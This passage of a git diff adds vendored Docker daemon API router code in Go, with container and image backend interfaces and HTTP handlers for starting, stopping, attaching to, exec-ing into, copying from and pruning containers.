+type monitorBackend interface { + ContainerChanges(name string) ([]archive.Change, error) + ContainerInspect(name string, size bool, version string) (interface{}, error) + ContainerLogs(ctx context.Context, name string, config *backend.ContainerLogsConfig, started chan struct{}) error + ContainerStats(ctx context.Context, name string, config *backend.ContainerStatsConfig) error + ContainerTop(name string, psArgs string) (*types.ContainerProcessList, error) + + Containers(config *types.ContainerListOptions) ([]*types.Container, error) +} + +// attachBackend includes function to implement to provide container attaching functionality. +type attachBackend interface { + ContainerAttach(name string, c *backend.ContainerAttachConfig) error +} + +// systemBackend includes functions to implement to provide system wide containers functionality +type systemBackend interface { + ContainersPrune(pruneFilters filters.Args) (*types.ContainersPruneReport, error) +} + +// Backend is all the methods that need to be implemented to provide container specific functionality. 
+type Backend interface { + execBackend + copyBackend + stateBackend + monitorBackend + attachBackend + systemBackend +} diff --git a/vendor/github.com/docker/docker/api/server/router/container/container.go b/vendor/github.com/docker/docker/api/server/router/container/container.go new file mode 100644 index 0000000000..bbed7e9944 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/container/container.go @@ -0,0 +1,77 @@ +package container + +import ( + "github.com/docker/docker/api/server/httputils" + "github.com/docker/docker/api/server/router" +) + +type validationError struct { + error +} + +func (validationError) IsValidationError() bool { + return true +} + +// containerRouter is a router to talk with the container controller +type containerRouter struct { + backend Backend + decoder httputils.ContainerDecoder + routes []router.Route +} + +// NewRouter initializes a new container router +func NewRouter(b Backend, decoder httputils.ContainerDecoder) router.Router { + r := &containerRouter{ + backend: b, + decoder: decoder, + } + r.initRoutes() + return r +} + +// Routes returns the available routes to the container controller +func (r *containerRouter) Routes() []router.Route { + return r.routes +} + +// initRoutes initializes the routes in container router +func (r *containerRouter) initRoutes() { + r.routes = []router.Route{ + // HEAD + router.NewHeadRoute("/containers/{name:.*}/archive", r.headContainersArchive), + // GET + router.NewGetRoute("/containers/json", r.getContainersJSON), + router.NewGetRoute("/containers/{name:.*}/export", r.getContainersExport), + router.NewGetRoute("/containers/{name:.*}/changes", r.getContainersChanges), + router.NewGetRoute("/containers/{name:.*}/json", r.getContainersByName), + router.NewGetRoute("/containers/{name:.*}/top", r.getContainersTop), + router.Cancellable(router.NewGetRoute("/containers/{name:.*}/logs", r.getContainersLogs)), + router.Cancellable(router.NewGetRoute("/containers/{name:.*}/stats", 
r.getContainersStats)), + router.NewGetRoute("/containers/{name:.*}/attach/ws", r.wsContainersAttach), + router.NewGetRoute("/exec/{id:.*}/json", r.getExecByID), + router.NewGetRoute("/containers/{name:.*}/archive", r.getContainersArchive), + // POST + router.NewPostRoute("/containers/create", r.postContainersCreate), + router.NewPostRoute("/containers/{name:.*}/kill", r.postContainersKill), + router.NewPostRoute("/containers/{name:.*}/pause", r.postContainersPause), + router.NewPostRoute("/containers/{name:.*}/unpause", r.postContainersUnpause), + router.NewPostRoute("/containers/{name:.*}/restart", r.postContainersRestart), + router.NewPostRoute("/containers/{name:.*}/start", r.postContainersStart), + router.NewPostRoute("/containers/{name:.*}/stop", r.postContainersStop), + router.NewPostRoute("/containers/{name:.*}/wait", r.postContainersWait), + router.NewPostRoute("/containers/{name:.*}/resize", r.postContainersResize), + router.NewPostRoute("/containers/{name:.*}/attach", r.postContainersAttach), + router.NewPostRoute("/containers/{name:.*}/copy", r.postContainersCopy), // Deprecated since 1.8, Errors out since 1.12 + router.NewPostRoute("/containers/{name:.*}/exec", r.postContainerExecCreate), + router.NewPostRoute("/exec/{name:.*}/start", r.postContainerExecStart), + router.NewPostRoute("/exec/{name:.*}/resize", r.postContainerExecResize), + router.NewPostRoute("/containers/{name:.*}/rename", r.postContainerRename), + router.NewPostRoute("/containers/{name:.*}/update", r.postContainerUpdate), + router.NewPostRoute("/containers/prune", r.postContainersPrune), + // PUT + router.NewPutRoute("/containers/{name:.*}/archive", r.putContainersArchive), + // DELETE + router.NewDeleteRoute("/containers/{name:.*}", r.deleteContainers), + } +} diff --git a/vendor/github.com/docker/docker/api/server/router/container/container_routes.go b/vendor/github.com/docker/docker/api/server/router/container/container_routes.go new file mode 100644 index 0000000000..9c9bc0f8c3 --- 
/dev/null +++ b/vendor/github.com/docker/docker/api/server/router/container/container_routes.go @@ -0,0 +1,554 @@ +package container + +import ( + "encoding/json" + "fmt" + "io" + "net/http" + "strconv" + "syscall" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/server/httputils" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/backend" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/versions" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/signal" + "golang.org/x/net/context" + "golang.org/x/net/websocket" +) + +func (s *containerRouter) getContainersJSON(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + filter, err := filters.FromParam(r.Form.Get("filters")) + if err != nil { + return err + } + + config := &types.ContainerListOptions{ + All: httputils.BoolValue(r, "all"), + Size: httputils.BoolValue(r, "size"), + Since: r.Form.Get("since"), + Before: r.Form.Get("before"), + Filters: filter, + } + + if tmpLimit := r.Form.Get("limit"); tmpLimit != "" { + limit, err := strconv.Atoi(tmpLimit) + if err != nil { + return err + } + config.Limit = limit + } + + containers, err := s.backend.Containers(config) + if err != nil { + return err + } + + return httputils.WriteJSON(w, http.StatusOK, containers) +} + +func (s *containerRouter) getContainersStats(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + stream := httputils.BoolValueOrDefault(r, "stream", true) + if !stream { + w.Header().Set("Content-Type", "application/json") + } + + config := &backend.ContainerStatsConfig{ + Stream: stream, + OutStream: w, + Version: string(httputils.VersionFromContext(ctx)), + } + + return 
s.backend.ContainerStats(ctx, vars["name"], config) +} + +func (s *containerRouter) getContainersLogs(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + // Args are validated before the stream starts because when it starts we're + // sending HTTP 200 by writing an empty chunk of data to tell the client that + // daemon is going to stream. By sending this initial HTTP 200 we can't report + // any error after the stream starts (i.e. container not found, wrong parameters) + // with the appropriate status code. + stdout, stderr := httputils.BoolValue(r, "stdout"), httputils.BoolValue(r, "stderr") + if !(stdout || stderr) { + return fmt.Errorf("Bad parameters: you must choose at least one stream") + } + + containerName := vars["name"] + logsConfig := &backend.ContainerLogsConfig{ + ContainerLogsOptions: types.ContainerLogsOptions{ + Follow: httputils.BoolValue(r, "follow"), + Timestamps: httputils.BoolValue(r, "timestamps"), + Since: r.Form.Get("since"), + Tail: r.Form.Get("tail"), + ShowStdout: stdout, + ShowStderr: stderr, + Details: httputils.BoolValue(r, "details"), + }, + OutStream: w, + } + + chStarted := make(chan struct{}) + if err := s.backend.ContainerLogs(ctx, containerName, logsConfig, chStarted); err != nil { + select { + case <-chStarted: + // The client may be expecting all of the data we're sending to + // be multiplexed, so send it through OutStream, which will + // have been set up to handle that if needed. 
+ fmt.Fprintf(logsConfig.OutStream, "Error running logs job: %v\n", err) + default: + return err + } + } + + return nil +} + +func (s *containerRouter) getContainersExport(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + return s.backend.ContainerExport(vars["name"], w) +} + +func (s *containerRouter) postContainersStart(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + // If contentLength is -1, we can assumed chunked encoding + // or more technically that the length is unknown + // https://golang.org/src/pkg/net/http/request.go#L139 + // net/http otherwise seems to swallow any headers related to chunked encoding + // including r.TransferEncoding + // allow a nil body for backwards compatibility + + version := httputils.VersionFromContext(ctx) + var hostConfig *container.HostConfig + // A non-nil json object is at least 7 characters. + if r.ContentLength > 7 || r.ContentLength == -1 { + if versions.GreaterThanOrEqualTo(version, "1.24") { + return validationError{fmt.Errorf("starting container with non-empty request body was deprecated since v1.10 and removed in v1.12")} + } + + if err := httputils.CheckForJSON(r); err != nil { + return err + } + + c, err := s.decoder.DecodeHostConfig(r.Body) + if err != nil { + return err + } + hostConfig = c + } + + if err := httputils.ParseForm(r); err != nil { + return err + } + + checkpoint := r.Form.Get("checkpoint") + checkpointDir := r.Form.Get("checkpoint-dir") + if err := s.backend.ContainerStart(vars["name"], hostConfig, checkpoint, checkpointDir); err != nil { + return err + } + + w.WriteHeader(http.StatusNoContent) + return nil +} + +func (s *containerRouter) postContainersStop(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + var seconds *int + if tmpSeconds := r.Form.Get("t"); tmpSeconds != "" { + valSeconds, err := 
strconv.Atoi(tmpSeconds) + if err != nil { + return err + } + seconds = &valSeconds + } + + if err := s.backend.ContainerStop(vars["name"], seconds); err != nil { + return err + } + w.WriteHeader(http.StatusNoContent) + + return nil +} + +type errContainerIsRunning interface { + ContainerIsRunning() bool +} + +func (s *containerRouter) postContainersKill(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + var sig syscall.Signal + name := vars["name"] + + // If we have a signal, look at it. Otherwise, do nothing + if sigStr := r.Form.Get("signal"); sigStr != "" { + var err error + if sig, err = signal.ParseSignal(sigStr); err != nil { + return err + } + } + + if err := s.backend.ContainerKill(name, uint64(sig)); err != nil { + var isStopped bool + if e, ok := err.(errContainerIsRunning); ok { + isStopped = !e.ContainerIsRunning() + } + + // Return error that's not caused because the container is stopped. + // Return error if the container is not running and the api is >= 1.20 + // to keep backwards compatibility. 
+ version := httputils.VersionFromContext(ctx) + if versions.GreaterThanOrEqualTo(version, "1.20") || !isStopped { + return fmt.Errorf("Cannot kill container %s: %v", name, err) + } + } + + w.WriteHeader(http.StatusNoContent) + return nil +} + +func (s *containerRouter) postContainersRestart(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + var seconds *int + if tmpSeconds := r.Form.Get("t"); tmpSeconds != "" { + valSeconds, err := strconv.Atoi(tmpSeconds) + if err != nil { + return err + } + seconds = &valSeconds + } + + if err := s.backend.ContainerRestart(vars["name"], seconds); err != nil { + return err + } + + w.WriteHeader(http.StatusNoContent) + + return nil +} + +func (s *containerRouter) postContainersPause(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + if err := s.backend.ContainerPause(vars["name"]); err != nil { + return err + } + + w.WriteHeader(http.StatusNoContent) + + return nil +} + +func (s *containerRouter) postContainersUnpause(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + if err := s.backend.ContainerUnpause(vars["name"]); err != nil { + return err + } + + w.WriteHeader(http.StatusNoContent) + + return nil +} + +func (s *containerRouter) postContainersWait(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + status, err := s.backend.ContainerWait(vars["name"], -1*time.Second) + if err != nil { + return err + } + + return httputils.WriteJSON(w, http.StatusOK, &container.ContainerWaitOKBody{ + StatusCode: int64(status), + }) +} + +func (s *containerRouter) getContainersChanges(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error 
{ + changes, err := s.backend.ContainerChanges(vars["name"]) + if err != nil { + return err + } + + return httputils.WriteJSON(w, http.StatusOK, changes) +} + +func (s *containerRouter) getContainersTop(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + procList, err := s.backend.ContainerTop(vars["name"], r.Form.Get("ps_args")) + if err != nil { + return err + } + + return httputils.WriteJSON(w, http.StatusOK, procList) +} + +func (s *containerRouter) postContainerRename(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + name := vars["name"] + newName := r.Form.Get("name") + if err := s.backend.ContainerRename(name, newName); err != nil { + return err + } + w.WriteHeader(http.StatusNoContent) + return nil +} + +func (s *containerRouter) postContainerUpdate(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + if err := httputils.CheckForJSON(r); err != nil { + return err + } + + var updateConfig container.UpdateConfig + + decoder := json.NewDecoder(r.Body) + if err := decoder.Decode(&updateConfig); err != nil { + return err + } + + hostConfig := &container.HostConfig{ + Resources: updateConfig.Resources, + RestartPolicy: updateConfig.RestartPolicy, + } + + name := vars["name"] + resp, err := s.backend.ContainerUpdate(name, hostConfig) + if err != nil { + return err + } + + return httputils.WriteJSON(w, http.StatusOK, resp) +} + +func (s *containerRouter) postContainersCreate(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + if err := httputils.CheckForJSON(r); err != nil { + return err + } + + name := r.Form.Get("name") + + 
config, hostConfig, networkingConfig, err := s.decoder.DecodeConfig(r.Body) + if err != nil { + return err + } + version := httputils.VersionFromContext(ctx) + adjustCPUShares := versions.LessThan(version, "1.19") + + ccr, err := s.backend.ContainerCreate(types.ContainerCreateConfig{ + Name: name, + Config: config, + HostConfig: hostConfig, + NetworkingConfig: networkingConfig, + AdjustCPUShares: adjustCPUShares, + }) + if err != nil { + return err + } + + return httputils.WriteJSON(w, http.StatusCreated, ccr) +} + +func (s *containerRouter) deleteContainers(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + name := vars["name"] + config := &types.ContainerRmConfig{ + ForceRemove: httputils.BoolValue(r, "force"), + RemoveVolume: httputils.BoolValue(r, "v"), + RemoveLink: httputils.BoolValue(r, "link"), + } + + if err := s.backend.ContainerRm(name, config); err != nil { + return err + } + + w.WriteHeader(http.StatusNoContent) + + return nil +} + +func (s *containerRouter) postContainersResize(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + height, err := strconv.Atoi(r.Form.Get("h")) + if err != nil { + return err + } + width, err := strconv.Atoi(r.Form.Get("w")) + if err != nil { + return err + } + + return s.backend.ContainerResize(vars["name"], height, width) +} + +func (s *containerRouter) postContainersAttach(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + err := httputils.ParseForm(r) + if err != nil { + return err + } + containerName := vars["name"] + + _, upgrade := r.Header["Upgrade"] + detachKeys := r.FormValue("detachKeys") + + hijacker, ok := w.(http.Hijacker) + if !ok { + return fmt.Errorf("error attaching to container %s, hijack connection missing", containerName) + } + + 
setupStreams := func() (io.ReadCloser, io.Writer, io.Writer, error) { + conn, _, err := hijacker.Hijack() + if err != nil { + return nil, nil, nil, err + } + + // set raw mode + conn.Write([]byte{}) + + if upgrade { + fmt.Fprintf(conn, "HTTP/1.1 101 UPGRADED\r\nContent-Type: application/vnd.docker.raw-stream\r\nConnection: Upgrade\r\nUpgrade: tcp\r\n\r\n") + } else { + fmt.Fprintf(conn, "HTTP/1.1 200 OK\r\nContent-Type: application/vnd.docker.raw-stream\r\n\r\n") + } + + closer := func() error { + httputils.CloseStreams(conn) + return nil + } + return ioutils.NewReadCloserWrapper(conn, closer), conn, conn, nil + } + + attachConfig := &backend.ContainerAttachConfig{ + GetStreams: setupStreams, + UseStdin: httputils.BoolValue(r, "stdin"), + UseStdout: httputils.BoolValue(r, "stdout"), + UseStderr: httputils.BoolValue(r, "stderr"), + Logs: httputils.BoolValue(r, "logs"), + Stream: httputils.BoolValue(r, "stream"), + DetachKeys: detachKeys, + MuxStreams: true, + } + + if err = s.backend.ContainerAttach(containerName, attachConfig); err != nil { + logrus.Errorf("Handler for %s %s returned error: %v", r.Method, r.URL.Path, err) + // Remember to close stream if error happens + conn, _, errHijack := hijacker.Hijack() + if errHijack == nil { + statusCode := httputils.GetHTTPErrorStatusCode(err) + statusText := http.StatusText(statusCode) + fmt.Fprintf(conn, "HTTP/1.1 %d %s\r\nContent-Type: application/vnd.docker.raw-stream\r\n\r\n%s\r\n", statusCode, statusText, err.Error()) + httputils.CloseStreams(conn) + } else { + logrus.Errorf("Error Hijacking: %v", err) + } + } + return nil +} + +func (s *containerRouter) wsContainersAttach(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + containerName := vars["name"] + + var err error + detachKeys := r.FormValue("detachKeys") + + done := make(chan struct{}) + started := make(chan struct{}) + + setupStreams := func() 
(io.ReadCloser, io.Writer, io.Writer, error) { + wsChan := make(chan *websocket.Conn) + h := func(conn *websocket.Conn) { + wsChan <- conn + <-done + } + + srv := websocket.Server{Handler: h, Handshake: nil} + go func() { + close(started) + srv.ServeHTTP(w, r) + }() + + conn := <-wsChan + return conn, conn, conn, nil + } + + attachConfig := &backend.ContainerAttachConfig{ + GetStreams: setupStreams, + Logs: httputils.BoolValue(r, "logs"), + Stream: httputils.BoolValue(r, "stream"), + DetachKeys: detachKeys, + UseStdin: true, + UseStdout: true, + UseStderr: true, + MuxStreams: false, // TODO: this should be true since it's a single stream for both stdout and stderr + } + + err = s.backend.ContainerAttach(containerName, attachConfig) + close(done) + select { + case <-started: + logrus.Errorf("Error attaching websocket: %s", err) + return nil + default: + } + return err +} + +func (s *containerRouter) postContainersPrune(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + pruneFilters, err := filters.FromParam(r.Form.Get("filters")) + if err != nil { + return err + } + + pruneReport, err := s.backend.ContainersPrune(pruneFilters) + if err != nil { + return err + } + return httputils.WriteJSON(w, http.StatusOK, pruneReport) +} diff --git a/vendor/github.com/docker/docker/api/server/router/container/copy.go b/vendor/github.com/docker/docker/api/server/router/container/copy.go new file mode 100644 index 0000000000..ede6dff92c --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/container/copy.go @@ -0,0 +1,119 @@ +package container + +import ( + "encoding/base64" + "encoding/json" + "fmt" + "io" + "net/http" + "os" + "strings" + + "github.com/docker/docker/api/server/httputils" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/versions" + "golang.org/x/net/context" +) + +// postContainersCopy is deprecated in favor of 
getContainersArchive. +func (s *containerRouter) postContainersCopy(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + // Deprecated since 1.8, Errors out since 1.12 + version := httputils.VersionFromContext(ctx) + if versions.GreaterThanOrEqualTo(version, "1.24") { + w.WriteHeader(http.StatusNotFound) + return nil + } + if err := httputils.CheckForJSON(r); err != nil { + return err + } + + cfg := types.CopyConfig{} + if err := json.NewDecoder(r.Body).Decode(&cfg); err != nil { + return err + } + + if cfg.Resource == "" { + return fmt.Errorf("Path cannot be empty") + } + + data, err := s.backend.ContainerCopy(vars["name"], cfg.Resource) + if err != nil { + if strings.Contains(strings.ToLower(err.Error()), "no such container") { + w.WriteHeader(http.StatusNotFound) + return nil + } + if os.IsNotExist(err) { + return fmt.Errorf("Could not find the file %s in container %s", cfg.Resource, vars["name"]) + } + return err + } + defer data.Close() + + w.Header().Set("Content-Type", "application/x-tar") + if _, err := io.Copy(w, data); err != nil { + return err + } + + return nil +} + +// // Encode the stat to JSON, base64 encode, and place in a header. 
+func setContainerPathStatHeader(stat *types.ContainerPathStat, header http.Header) error { + statJSON, err := json.Marshal(stat) + if err != nil { + return err + } + + header.Set( + "X-Docker-Container-Path-Stat", + base64.StdEncoding.EncodeToString(statJSON), + ) + + return nil +} + +func (s *containerRouter) headContainersArchive(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + v, err := httputils.ArchiveFormValues(r, vars) + if err != nil { + return err + } + + stat, err := s.backend.ContainerStatPath(v.Name, v.Path) + if err != nil { + return err + } + + return setContainerPathStatHeader(stat, w.Header()) +} + +func (s *containerRouter) getContainersArchive(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + v, err := httputils.ArchiveFormValues(r, vars) + if err != nil { + return err + } + + tarArchive, stat, err := s.backend.ContainerArchivePath(v.Name, v.Path) + if err != nil { + return err + } + defer tarArchive.Close() + + if err := setContainerPathStatHeader(stat, w.Header()); err != nil { + return err + } + + w.Header().Set("Content-Type", "application/x-tar") + _, err = io.Copy(w, tarArchive) + + return err +} + +func (s *containerRouter) putContainersArchive(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + v, err := httputils.ArchiveFormValues(r, vars) + if err != nil { + return err + } + + noOverwriteDirNonDir := httputils.BoolValue(r, "noOverwriteDirNonDir") + return s.backend.ContainerExtractToDir(v.Name, v.Path, noOverwriteDirNonDir, r.Body) +} diff --git a/vendor/github.com/docker/docker/api/server/router/container/exec.go b/vendor/github.com/docker/docker/api/server/router/container/exec.go new file mode 100644 index 0000000000..1134a0e797 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/container/exec.go @@ -0,0 +1,140 @@ +package container + +import ( + "encoding/json" + "fmt" + "io" + 
"net/http" + "strconv" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/server/httputils" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/versions" + "github.com/docker/docker/pkg/stdcopy" + "golang.org/x/net/context" +) + +func (s *containerRouter) getExecByID(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + eConfig, err := s.backend.ContainerExecInspect(vars["id"]) + if err != nil { + return err + } + + return httputils.WriteJSON(w, http.StatusOK, eConfig) +} + +func (s *containerRouter) postContainerExecCreate(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + if err := httputils.CheckForJSON(r); err != nil { + return err + } + name := vars["name"] + + execConfig := &types.ExecConfig{} + if err := json.NewDecoder(r.Body).Decode(execConfig); err != nil { + return err + } + + if len(execConfig.Cmd) == 0 { + return fmt.Errorf("No exec command specified") + } + + // Register an instance of Exec in container. + id, err := s.backend.ContainerExecCreate(name, execConfig) + if err != nil { + logrus.Errorf("Error setting up exec command in container %s: %v", name, err) + return err + } + + return httputils.WriteJSON(w, http.StatusCreated, &types.IDResponse{ + ID: id, + }) +} + +// TODO(vishh): Refactor the code to avoid having to specify stream config as part of both create and start. 
+func (s *containerRouter) postContainerExecStart(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + version := httputils.VersionFromContext(ctx) + if versions.GreaterThan(version, "1.21") { + if err := httputils.CheckForJSON(r); err != nil { + return err + } + } + + var ( + execName = vars["name"] + stdin, inStream io.ReadCloser + stdout, stderr, outStream io.Writer + ) + + execStartCheck := &types.ExecStartCheck{} + if err := json.NewDecoder(r.Body).Decode(execStartCheck); err != nil { + return err + } + + if exists, err := s.backend.ExecExists(execName); !exists { + return err + } + + if !execStartCheck.Detach { + var err error + // Setting up the streaming http interface. + inStream, outStream, err = httputils.HijackConnection(w) + if err != nil { + return err + } + defer httputils.CloseStreams(inStream, outStream) + + if _, ok := r.Header["Upgrade"]; ok { + fmt.Fprint(outStream, "HTTP/1.1 101 UPGRADED\r\nContent-Type: application/vnd.docker.raw-stream\r\nConnection: Upgrade\r\nUpgrade: tcp\r\n") + } else { + fmt.Fprint(outStream, "HTTP/1.1 200 OK\r\nContent-Type: application/vnd.docker.raw-stream\r\n") + } + + // copy headers that were removed as part of hijack + if err := w.Header().WriteSubset(outStream, nil); err != nil { + return err + } + fmt.Fprint(outStream, "\r\n") + + stdin = inStream + stdout = outStream + if !execStartCheck.Tty { + stderr = stdcopy.NewStdWriter(outStream, stdcopy.Stderr) + stdout = stdcopy.NewStdWriter(outStream, stdcopy.Stdout) + } + } + + // Now run the user process in container. + // Maybe we should we pass ctx here if we're not detaching? 
+ if err := s.backend.ContainerExecStart(context.Background(), execName, stdin, stdout, stderr); err != nil { + if execStartCheck.Detach { + return err + } + stdout.Write([]byte(err.Error() + "\r\n")) + logrus.Errorf("Error running exec in container: %v", err) + } + return nil +} + +func (s *containerRouter) postContainerExecResize(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + height, err := strconv.Atoi(r.Form.Get("h")) + if err != nil { + return err + } + width, err := strconv.Atoi(r.Form.Get("w")) + if err != nil { + return err + } + + return s.backend.ContainerExecResize(vars["name"], height, width) +} diff --git a/vendor/github.com/docker/docker/api/server/router/container/inspect.go b/vendor/github.com/docker/docker/api/server/router/container/inspect.go new file mode 100644 index 0000000000..dbbced7eee --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/container/inspect.go @@ -0,0 +1,21 @@ +package container + +import ( + "net/http" + + "github.com/docker/docker/api/server/httputils" + "golang.org/x/net/context" +) + +// getContainersByName inspects container's configuration and serializes it as json. 
+func (s *containerRouter) getContainersByName(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + displaySize := httputils.BoolValue(r, "size") + + version := httputils.VersionFromContext(ctx) + json, err := s.backend.ContainerInspect(vars["name"], displaySize, version) + if err != nil { + return err + } + + return httputils.WriteJSON(w, http.StatusOK, json) +} diff --git a/vendor/github.com/docker/docker/api/server/router/experimental.go b/vendor/github.com/docker/docker/api/server/router/experimental.go new file mode 100644 index 0000000000..51385c2552 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/experimental.go @@ -0,0 +1,67 @@ +package router + +import ( + "errors" + "net/http" + + "golang.org/x/net/context" + + apierrors "github.com/docker/docker/api/errors" + "github.com/docker/docker/api/server/httputils" +) + +var ( + errExperimentalFeature = errors.New("This experimental feature is disabled by default. Start the Docker daemon with --experimental in order to enable it.") +) + +// ExperimentalRoute defines an experimental API route that can be enabled or disabled. +type ExperimentalRoute interface { + Route + + Enable() + Disable() +} + +// experimentalRoute defines an experimental API route that can be enabled or disabled. +// It implements ExperimentalRoute +type experimentalRoute struct { + local Route + handler httputils.APIFunc +} + +// Enable enables this experimental route +func (r *experimentalRoute) Enable() { + r.handler = r.local.Handler() +} + +// Disable disables the experimental route +func (r *experimentalRoute) Disable() { + r.handler = experimentalHandler +} + +func experimentalHandler(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + return apierrors.NewErrorWithStatusCode(errExperimentalFeature, http.StatusNotImplemented) +} + +// Handler returns returns the APIFunc to let the server wrap it in middlewares. 
+func (r *experimentalRoute) Handler() httputils.APIFunc { + return r.handler +} + +// Method returns the http method that the route responds to. +func (r *experimentalRoute) Method() string { + return r.local.Method() +} + +// Path returns the subpath where the route responds to. +func (r *experimentalRoute) Path() string { + return r.local.Path() +} + +// Experimental will mark a route as experimental. +func Experimental(r Route) Route { + return &experimentalRoute{ + local: r, + handler: experimentalHandler, + } +} diff --git a/vendor/github.com/docker/docker/api/server/router/image/backend.go b/vendor/github.com/docker/docker/api/server/router/image/backend.go new file mode 100644 index 0000000000..19a67a5ed0 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/image/backend.go @@ -0,0 +1,45 @@ +package image + +import ( + "io" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/backend" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/registry" + "golang.org/x/net/context" +) + +// Backend is all the methods that need to be implemented +// to provide image specific functionality. 
+type Backend interface { + containerBackend + imageBackend + importExportBackend + registryBackend +} + +type containerBackend interface { + Commit(name string, config *backend.ContainerCommitConfig) (imageID string, err error) +} + +type imageBackend interface { + ImageDelete(imageRef string, force, prune bool) ([]types.ImageDelete, error) + ImageHistory(imageName string) ([]*types.ImageHistory, error) + Images(imageFilters filters.Args, all bool, withExtraAttrs bool) ([]*types.ImageSummary, error) + LookupImage(name string) (*types.ImageInspect, error) + TagImage(imageName, repository, tag string) error + ImagesPrune(pruneFilters filters.Args) (*types.ImagesPruneReport, error) +} + +type importExportBackend interface { + LoadImage(inTar io.ReadCloser, outStream io.Writer, quiet bool) error + ImportImage(src string, repository, tag string, msg string, inConfig io.ReadCloser, outStream io.Writer, changes []string) error + ExportImage(names []string, outStream io.Writer) error +} + +type registryBackend interface { + PullImage(ctx context.Context, image, tag string, metaHeaders map[string][]string, authConfig *types.AuthConfig, outStream io.Writer) error + PushImage(ctx context.Context, image, tag string, metaHeaders map[string][]string, authConfig *types.AuthConfig, outStream io.Writer) error + SearchRegistryForImages(ctx context.Context, filtersArgs string, term string, limit int, authConfig *types.AuthConfig, metaHeaders map[string][]string) (*registry.SearchResults, error) +} diff --git a/vendor/github.com/docker/docker/api/server/router/image/image.go b/vendor/github.com/docker/docker/api/server/router/image/image.go new file mode 100644 index 0000000000..54a4d51482 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/image/image.go @@ -0,0 +1,50 @@ +package image + +import ( + "github.com/docker/docker/api/server/httputils" + "github.com/docker/docker/api/server/router" +) + +// imageRouter is a router to talk with the image controller +type 
